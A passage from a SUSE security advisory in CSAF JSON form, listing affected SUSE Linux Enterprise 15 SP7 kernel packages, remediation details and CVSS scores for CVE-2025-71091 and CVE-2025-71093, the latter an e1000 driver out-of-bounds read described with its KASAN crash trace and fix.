"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71091",
"url": "https://www.suse.com/security/cve/CVE-2025-71091"
},
{
"category": "external",
"summary": "SUSE Bug 1256773 for CVE-2025-71091",
"url": "https://bugzilla.suse.com/1256773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
